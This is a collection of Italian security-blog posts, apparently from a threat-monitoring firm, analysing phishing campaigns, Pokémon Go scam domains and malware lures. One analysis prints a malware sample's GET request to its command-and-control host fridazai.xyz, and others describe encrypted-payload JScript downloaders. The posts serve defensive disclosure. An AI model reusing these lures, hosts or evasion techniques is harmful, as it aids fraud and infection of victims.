Pokemon Go – Le truffe impazzano

 

Logo_Pokémon_Go

 

In Italia non è ancora arrivata l’applicazione Pokemon GO, ma in tutto il mondo è già un vero tormentone. La nuova applicazione sviluppata da Nintendo permette all’utente di giocare attraverso il proprio smartphone iOS o Android sfruttando la realtà aumentata e la tecnologia GPS.

Il videogioco ha sollevato un furore mediatico che l’azienda non percepiva dai tempi della Wii, le azioni di Nintendo hanno raggiunto quota 26 dollari con un rialzo massimo del 14%. Il più alto rialzo dal 1983 ad oggi per l’azienda.

pokemon1_col-750x698 pokemon1_line

In base ai dati pubblicati dalla SurveyMonkey il gioco è il più utilizzato negli USA e l’utilizzo medio quotidiano per utente ha superato i due Social Network Snapchat e Twitter.

L’attesa snervante per gli utenti Europei, che ancora non posso scaricare l’applicazione e la forte richiesta del gioco hanno creato dei market-place paralleli per il mercato Android in cui è possibile scaricare il software. Peccato che la società di consulenza proofpoint abbia individuato la presenza di un malware nell’applicazione diffusa nei market-place di terze parti.

Ma un mercato così vasto non ha solo alimentato la creazione di malware, ma sono in corso anche campagne di Phishing con domini creati ad-hoc. Campagne che promettono all’utente la vincita di Poké Coins a patto di condividere il sito internet su Facebook e una volta effettua la condivisione l’utente viene poi reindirizzato in un ulteriore sito internet in base alla sua localizzazione. Quest’ultimo sito promette buoni spesa, formazione lavorativa, ecc a patto di inserire i propri dati personali (Nome, Cognome, eMail, Residenza). Tali dati verranno sfruttati probabilmente per campagne intense di Spam, ma conclusa la procedura ovviamente non si ottiene alcun Poké Coins.

Attraverso il nostro monitoraggio di brand, nelle ultime 72h sono stati registrati un alto numero di domini attinenti:

  • 762 nuovo domini contenenti la keyword: pokemon
  • 406 nuovi domini contenenti la keyword: pokemongo
  • 59 nuovi domini contenenti la keyword: pokego
  • 32 nuovi domini contenenti la keyword: pokemons
  • 19 nuovi domini contenenti la keyword: pokemon-go
  • 7 nuovi domini contenenti la keyword: pokeball
  • 6 nuovi domini contenenti la keyword: gopokemon
  • 3 nuovi domini contenenti la keyword: getpoke
  • 1 nuovo dominio contenente la keyword: go-pokemon
  • 1 nuovo dominio contenete la keyword: pokemonsgo

Non sono state rilevate nuove registrazione a nome dei tre personaggi principali del gioco: Squirtle, Bulbasaur e Charmander.

Tra questi domini abbiamo analizzato pokemons-go.com, è stato registrato il 12 Luglio 2016 e richiede la condivisione su Facebook per ottenere il premio. In totale è stato condiviso 5220 volte, commentato 1330 volte e ha ottenuto 578 “Mi Piace”. Per un totale di 7128 interazioni sul Social Network Facebook.

Di seguito vi riportiamo gli screenshot di alcuni siti internet fraudolenti:

Questo slideshow richiede JavaScript.

 

 

 

 

 

 

 

/da
sito phishing Creval

Phishing ai danni del Gruppo Valtellinese

In data odierna abbiamo individuato un tentativo di frode  a mezzo di posta elettronica a danno dei clienti di Credito Valtellinese

20160704130047

 

Il messaggio di posta elettronica fraudolento presentava le seguenti caratteristiche:

Oggetto: Password Scaduta

Mittente: “Credito Valtellinese” <[email protected]>

Testo  del messaggio

————————————————————————

Attenzione. La tua password è scaduta, per poter completare il login, accedi  cliccando qui

————————————————————————

Il collegamento ipertestuale presente nella mail svolge una funzione di redirect che porta i visitatori a una pagina fraudolenta dove vengono richiesti i dati di login dell’account.

 

crop_1467630316

 

Dalle analisi effettuate si è rilevato, nel primo trimestre dell’anno in corso, due attacchi di phishing isolati, forse il test di funzionamento del kit impiegato per la massiccia campagna di phishing rilevata nel mese di Giugno.

I criminali autori di questi attacchi sembrano prediligere l’impiego di host posizionati nel sud est-asiatico (Indonesia e Korea).

/da

Falso avviso di spedizione del corriere GLS

GLS_Finta_Comunicazione

Una nuova andata di ransomware giunge agli utenti attraverso eMail solo apparentemente inviate dal vettore nazionale GLS. Il messaggio di posta con oggetto “GLS Italy – Notifica spedizione E4 369026685” informa l’utente che l’azienda “CASTELLARI SRL” ha inviato un collo al destinatario “CLIENTE SRL” e che è possibile seguire lo stato d’avanzamento della spedizione direttamente sul sito di GLS all’indirizzo riportato.

Selezionando l’indirizzo “http://www.gls-italy.com/track_trace_user.asp?locpartenza=E4&numsped=369026685” avviene il download di un file compresso in formato ZIP denominato “informazionispedizione.zip” contenente un JavaScript che ha l’onere di scaricare ed eseguire il malware. Il file JavaScript confonde l’utente sfruttando la doppia estensione .PDF.JS ed è stato offuscato per impedire un immediata analisi.

Analizzando l’Header dell’eMail rileviamo lo sfruttamento di una casella eMail del Gruppo Buffetti per l’invio massivo del Phishing, è probabile che ignari utenti siano entrati in possesso delle credenziali della casella di posta e l’abbiano sfruttata per inviare le comunicazioni fraudolente.

GLS_Header_eMail

La scansione su VirusTotal, dopo pochi minuti dalla ricezione dell’eMail, del file .cab scaricato dal downloader JavaScript riporta il rilevamento della minaccia da parte di soli 3 Antivirus su 53.

GLS_Malware

 

/1 Commento/da

Phishing ai danni del Gruppo Hera

Phishing Gruppo Hera

 

Durante l’analisi quotidiana delle attività di Phishing nazionali ed internazionali abbiamo rilevato una nuova campagna ai danni del Gruppo Hera Coom, i Phisher sfruttano il logo e il nome della società leader nei servizi ambientali, idrici ed energetici con sede a Bologna per carpire vittime con la stessa tecnica che abbiamo visto recentemente anche per il gruppo Edison.

L’utente informato mediante eMail che ha diritto ad un rimborso dal Gruppo Hera per un errato conteggio della sua fattura viene invitato a visitare un sito internet per completare la procedura di rimborso. Il sito internet fraudolento che vediamo nell’immagine di apertura richiede all’utente di digitare i suoi dati personali e i dati della propria Carta di Credito con la falsa promessa di ricevere un accredito da parte della società Bolognese. I dati inseriti nel sito fraudolento verranno sfruttati per addebitare cifre indesiderate sulle carte di credito delle vittime e non per accreditargli l’atteso rimborso.

Come sempre invitiamo gli utenti alla massima attenzione quando si naviga su internet.

/da
clone phishing Banque Postale

Phishing Banque Postale FR

Nella nostrà attività svolgiamo un monitoraggio costante incentrato non solo sul phishing italiano, ma anche straniero, prestando attenzione a quei paesi europei che presentano un trend di attacchi in crescita. Tra questi vi è la Francia, che vede Banque Postale come uno dei target più bersagliati dai criminali. L’esame delle casistiche non di rado porta ad individuare cloni di enti stranieri inseriti nel medesimo sito violato che ospita anche cloni di enti italiani, palesando come i criminali agiscano in maniera traversale e godano di strutture posizionate nei diversi paesi, attaccando La Banque Postale, ma anche istituti di credito italiani. Continua a leggere

/da

Phishing Banque Postale FR

,

Dans notre activité nous effectuons un monitorage constant qui met l’accent non seulement sur le phishing italien mais aussi sur celui étranger, prêtant une attention particulière aux pays européens qui présentent une augmentation des attaques. Parmi ces pays figure la France où la Banque Postale est l’une des cibles de prédilection des criminels. L’examen des listes permet fréquemment de trouver des clones d’institutions étrangères insérés au sein même du site violé qui héberge également des clones d’institutions italiennes, illustrant la manière dont les criminels agissent de manière transversale, bénéficiant de structures situées dans les différents pays, attaquant la Banque Postale, mais aussi les instituts de crédits italiens.

Le graphique reproduit ci-dessous montre clairement la forte croissance des attaques contre la Banque Postale (ainsi que cela a été relevé par le D3Lab), héritier financier du groupe «La Poste» qui propose des services bancaires et financiers.

Continua a leggere

/da

Diffusione di Malware crittografati, decrittografati dal JScript

 

eMail Malware Crittografato

Una recente tecnica sfruttata per diffondere ed eseguire malware attraverso un downloader JScript consiste nel crittografare il malware. Il file JScript in allegato all’eMail e compresso in formato .zip come nell’immagine di apertura non ha il solo compito di scaricare ed eseguire il file eseguibile ma avrà l’onore di decodificare quest’ultimo.

Per rendere il download più trasparente agli Antivirus viene sfruttata la crittografia, rendendo di fatto il malware un file innocuo. Il beneficio di questa tecnica è facilmente visualizzabile nella seguente immagine, il portale VirusTotal eseguendo la scansione del malware crittografato sfruttando oltre 50 antivirus NON riesce ad identificare il file come malevolo. Inoltre si previene l’inserimento nelle BlackList o RBL (Realtime Blackhole List) del sito internet in quanto all’apparenza non sta generando traffico malevole.

VirusTotal Malware Crittografato

La tecnica è assolutamente efficace per non far determinare all’antivirus che è in corso il download di un file malevolo che una volta decrittografato viene correttamente rilevato quale malware da quasi il 40% di Antivirus disponibili su VirusTotal.

VirusTotal Malware CrittografatoProcedendo ad una decodifica del file JScript possiamo analizzare più dettagliatamente il funzionamento di questa tecnica.

JScript deoffuscatato

Come possiamo visualizzare dall’immagine precedente, il file JScript che si presenta codificato esegue inizialmente la creazione di un Array contenente 3 URL dal quale può scaricare il malware crittografato. Vengono indicati tre differenti url poiché se il primo url non è più disponibile si procederà ad eseguire il download dal secondo sito e così via. Tutti siti internet che risultano essere compromessi.

Successivamente viene inizializzata una variabile contenete la path della directory Temporanea dell’utente, tale variabile viene sfruttata per salvare il file scaricato dagli url precedenti che verrà salvato con il nome i8aBHu1RbJvtm. Una volta scaricato e salvato il malware crittografato viene rinominato aggiungendo l’estensione .exe (i8aBHu1RbJvtm.exe). Successivamente verrà richiamata la funzione KFEy3 che ha l’onere di eseguire la de-crittografia del malware.

Il file scaricato e crittografato viene de-crittografato attraverso una sostituzione monoalfabetica, ovvero la sostituzione di un testo cifrato con un testo in chiaro in base a regole precedentemente stabilite. Durante la de-cifratura, ad ogni porzione del codice cifrato viene associata la corrispondente porzione del codice in chiaro.

Una volta de-crittografato viene avviato e nell’immagine seguente vediamo le conseguenze dell’avvio.

2016.05.27_Screenshot_1007220

Si tratta di un ransomware!

/da

Falsa querela diffonde Malware via eMail

Malware Querela eMail

In data odierna abbiamo rilevato una nuova importante campagna di diffusione Malware a mezzo eMail: per adescare l’utente nella trappola viene sfruttata una finta comunicazione di Querela per Diffamazione Aggravata. Continua a leggere

/da
Phishing prevenzione: Riconoscimento e identificazione

Attività formativa “Phishing prevenzione: Riconoscimento e identificazione”

Phishing prevenzione: Riconoscimento e identificazione

Ha preso il via nella giornata di ieri l’attività formativa D3Lab in tema di phishing.

Il corso “Phishing prevenzione: Riconoscimento e identificazione” mira ad illustrare caratteristiche, natura, pericolosità di questa tipologia di minaccia non volgendo la propria attenzione unicamente all’utenza customers, ma illustrando i rischi connessi alle aziende, i possibili conseguente attacchi “man in the mail”, il furto di dati e progetti aziendali e lo spear phishig.

about spear phishing

La lezione, della durata variabile da 2 ore e mezzo a 4 ore, dipendentemente dall’interazione con la classe, ha come target personale generico, risultando idonea a far conoscere la minaccia phishing a personale amministrativo, uffici di segretaria e quadri (i più colpiti dallo spear phishing).

phishing WhatApp

La presentazione risulta particolarmente utile per il personale di call center e di filiale che per primo si trova ad interloquire con il cliente ed identificando la minaccia descritta dall’utente customer può raccogliere i dati rilevanti che trasmessi agli assenti anti-frode e sicurezza consentono l’attivazione delle idonee azioni di contrasto.

procedura raccolta dati dal cliente per call center e filiali

Le società interessate possono contattarci per offerte mirate ai riferimenti indicati nella pagina “contatti“.

/da

Malware “Disoccupazione” e C&C Godzilla Loader

email_disoccupazione

Nella giornata odierna ci è pervenuta la segnalazione di una nuova campagna di diffusione di Malware a mezzo eMail, come potete vedere dallo screenshot in apertura la comunicazione attrae particolarmente l’attenzione del destinatario perché tratta di argomenti molto sensibili ad un dipendente. Il licenziamento e la disoccupazione sono ad oggi due argomenti di forte interesse e preoccupazione pertanto un utente sbadato con il patema di ricevere la notifica di disoccupazione può cadere nel tranello ed aprire l’allegato denominato documenti n.1,2,3_doc.zip tale allegato contiene l’eseguibile documenti n.1,2,3_doc.DOCX.exe in grado di scaricare ed eseguire un malware.

La seguente breve analisi vuole riportare alcuni dettagli tecnici rilevati nell’analisi condotta nei nostri laboratori, per rendere noto il lavoro meticoloso svolto per diffondere virus a partire da una eMail scritta correttamente nel lessico e nei contenuti e anche una importante precisione tecnica per infettare il computer.

Il file allegato, come anticipato, eseguirà il download del malware via web eseguendo la seguente chiamata GET:

GET /gate.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*
Accept-Language: it
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: fridazai.xyz

Il dominio fridazai.xyz che subito colpisce l’occhio non si tratta di un sito internet compromesso, come recentemente accade per la diffusione di Cryptoware, ma è stato registrato ad-hoc il 25 Aprile 2016 sfruttando il WhoisGuard Protected per anonimizzare l’intestazione.

Domain Name: FRIDAZAI.XYZ
Domain ID: D19967705-CNIC
WHOIS Server: whois.namecheap.com
Updated Date: 2016-04-25T16:28:06.0Z
Creation Date: 2016-04-25T16:28:03.0Z
Registry Expiry Date: 2017-04-25T23:59:59.0Z
Sponsoring Registrar: Namecheap
Sponsoring Registrar IANA ID: 1068
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant ID: C47900863-CNIC
Registrant Name: WhoisGuard Protected
Registrant Organization: WhoisGuard, Inc.
>>> Last update of WHOIS database: 2016-05-12T12:01:37.0Z <<<

Fridazai è l’anello chiave di questa analisi essendo un server C&C (Command and Control) gestito dal Bootmaster, il panello di accesso riporta il nome Godzilla e indubbiamente guardando il logo il riferimento al film è decisamente lampante.

 

c&c_godzilla

 

Una volta avviato il malware eseguirà il download attraverso la chiamate GET precedentemente riportata e andrà a replicarsi all’interno della directory Programmi del proprio computer.

 

vlcsnap-2016-05-12-14h12m26s568

 

Successivamente, non avviandosi nell’immediatezza, andrà a memorizzare una nuova chiave nel registro di Windows per avviarsi al successivo avvio.

 

vlcsnap-2016-05-12-14h16m43s063

 

Il nome dell’eseguibile corrisponderà all’id sfruttato nel C&C per rappresentare i computer infetti e salvato anche in un dedicato file .ini

 

vlcsnap-2016-05-12-14h21m48s272

 

Allo stato attuale l’analisi sembrerebbe indicare che il malware riesca a riconoscere di essere in esecuzione su una sand box e adotta comportamenti atti ad evitare la completa analisi. Nell’attesa di ulteriori accertamenti vogliamo mostrarvi alcune schermate del C&C Godlizza Loader rilevate in un forum tematico, i cui particolari lascerebbero ipotizzare che la paternità di questa struttura C&C vada ricercata in Russia.

Questo slideshow richiede JavaScript.

/da